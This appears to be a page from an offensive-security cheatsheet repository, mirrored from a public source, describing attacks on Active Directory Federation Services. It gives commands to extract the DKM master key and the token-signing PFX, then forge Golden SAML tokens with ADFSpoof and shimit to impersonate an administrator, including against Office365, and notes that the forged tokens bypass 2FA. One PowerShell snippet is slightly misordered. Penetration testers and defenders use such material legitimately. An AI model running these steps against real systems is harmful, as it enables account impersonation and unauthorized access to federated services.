daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adfs-federation-services.md (7312B)


      1 ---
      2 title: "Active Directory - Federation Services"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adfs-federation-services.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adfs-federation-services.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Federation Services
     12 
     13 Active Directory Federation Services (AD FS) is a software component developed by Microsoft that provides users with single sign-on (SSO) access to systems and applications located across organizational boundaries. It uses a claims-based access control authorization model to maintain application security and to provide seamless access to web-based applications that are hosted inside or outside the corporate network.
     14 
     15 ## ADFS - DKM Master Key
     16 
     17 * The DKM key is stored in the `thumbnailPhoto` attribute of the AD contact object.
     18 
     19 ```ps1
     20 $key=(Get-ADObject -filter 'ObjectClass -eq "Contact" -and name -ne "CryptoPolicy"' -SearchBase "CN=ADFS,CN=Microsoft,CN=Program Data,DC=domain,DC=local" -Properties thumbnailPhoto).thumbnailPhoto
     21 [System.BitConverter]::ToString($key)
     22 ```
     23 
     24 ## ADFS - Trust Relationship
     25 
     26 Gets the relying party trusts of the Federation Service.
     27 
     28 * Search for `IssuanceAuthorizationRules`
     29 
     30     ```ps1
     31     Get-AdfsRelyingPartyTrust
     32     ```
     33 
     34 ## ADFS - Golden SAML
     35 
     36 Golden SAML is a type of attack where an attacker creates a forged SAML (Security Assertion Markup Language) authentication response to impersonate a legitimate user and gain unauthorized access to a service provider. This attack leverages the trust established between the identity provider (IdP) and service provider (SP) in a SAML-based single sign-on (SSO) system.
     37 
     38 * Golden SAML are effective even when 2FA is enabled.
     39 * The token-signing private key is not renewed automatically
     40 * Changing a user’s password won't affect the generated SAML
     41 
     42 **Requirements**:
     43 
     44 * ADFS service account
     45 * The private key (PFX with the decryption password)
     46 
     47 **Exploitation**:
     48 
     49 * Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on ADFS server as the **ADFS service account**. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query`
     50 * Convert PFX and Private Key to binary format
     51 
     52     ```ps1
     53     # For the pfx
     54     echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin
     55     # For the private key
     56     echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin 
     57     ```
     58 
     59 * Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof).
     60 
     61     ```ps1
     62     mkdir ADFSpoofTools
     63     cd $_
     64     git clone https://github.com/dmb2168/cryptography.git
     65     git clone https://github.com/mandiant/ADFSpoof.git 
     66     virtualenv3 venvADFSSpoof
     67     source venvADFSSpoof/bin/activate
     68     pip install lxml
     69     pip install signxml
     70     pip uninstall -y cryptography
     71     cd cryptography
     72     pip install -e .
     73     cd ../ADFSpoof
     74     pip install -r requirements.txt
     75     python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls
     76     /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
     77     ```
     78 
     79 **Manual Exploitation**:
     80 
     81 * Retrieve the WID path: `Get-AdfsProperties`
     82 * Retrieve the ADFS Relying Party Trusts: `Get-AdfsRelyingPartyTrust`
     83 * Retrieve the signing certificate, save the `EncryptedPfx` and decode it `base64 -d adfs.b64 > adfs.bin`
     84 
     85     ```powershell
     86     $cmd.CommandText = "SELECT ServiceSettingsData from AdfsConfigurationV3.IdentityServerPolicy.ServiceSettings"
     87     $client= New-Object System.Data.SQLClient.SQLConnection($ConnectionString);
     88     $client.Open();
     89     $cmd = $client.CreateCommand()
     90     $cmd.CommandText = "SELECT name FROM sys.databases"
     91     $reader = $cmd.ExecuteReader()
     92     $reader.Read() | Out-Null
     93     $name = $reader.GetString(0)
     94     $reader.Close()
     95     Write-Output $name;
     96     ```
     97 
     98 * Retrieve the DKM key stored inside the `thumbnailPhoto` attribute of the Active Directory:
     99 
    100     ```ps1
    101     ldapsearch -x -H ldap://DC.domain.local -b "CN=ADFS,CN=Microsoft,CN=Program Data,DC=DOMAIN,DC=LOCAL" -D "adfs-svc-account@domain.local" -W -s sub "(&(objectClass=contact)(!(name=CryptoPolicy)))" thumbnailPhoto
    102     ```
    103 
    104 * Convert the retrieved key to raw format: `echo "RETRIEVED_KEY_HERE" | base64 -d > adfs.key`
    105 * Use [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof) to generate the Golden SAML
    106 
    107 NOTE: There might be multiple master keys in the container, remember to try them all.
    108 
    109 **Golden SAML Examples**
    110 
    111 * SAML2: requires `--endpoint`, `--nameidformat`, `--identifier`, `--nameid` and `--assertions`
    112 
    113     ```ps1
    114     python ADFSpoof.py -b adfs.bin adfs.key -s adfs.domain.local saml2 --endpoint https://www.contoso.com/adfs/ls
    115     /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
    116     ```
    117 
    118 * Office365: requires `--upn` and `--objectguid`
    119 
    120     ```ps1
    121     python3 ADFSpoof.py -b adfs.bin adfs.key -s sts.domain.local o365 --upn user@domain.local --objectguid 712D7BFAE0EB79842D878B8EEEE239D1
    122     ```
    123 
    124 * Other: connect to the service provider using a known account, analyze the SAML token attributes given and reuse their format.
    125 
    126 **NOTE**: Sync the time between the attacker's machine generating the Golden SAML and the ADFS server.
    127 
    128 Other interesting tools to exploit AD FS:
    129 
    130 * [secureworks/whiskeysamlandfriends/WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) - Proof of concept for a Golden SAML attack with Remote ADFS Configuration Extraction.
    131 * [cyberark/shimit](https://github.com/cyberark/shimit) - A tool that implements the Golden SAML attack
    132 
    133     ```ps1
    134     python ./shimit.py -idp http://adfs.domain.local/adfs/services/trust -pk key -c cert.pem -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id REDACTED
    135     ```
    136 
    137 ## References
    138 
    139 * [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
    140 * [Active Directory Federation Services (ADFS) Distributed Key Manager (DKM) Keys - Threat Hunter Playbook](https://threathunterplaybook.com/library/windows/adfs_dkm_keys.html)
    141 * [Exploring the Golden SAML Attack Against ADFS - 7 December 2021](https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs)
    142 * [Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps - Shaked Reiner - 11/21/17](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps)
    143 * [Meet Silver SAML: Golden SAML in the Cloud - Tomer Nahum and Eric Woodruff - Feb 29, 2024](https://www.semperis.com/blog/meet-silver-saml/)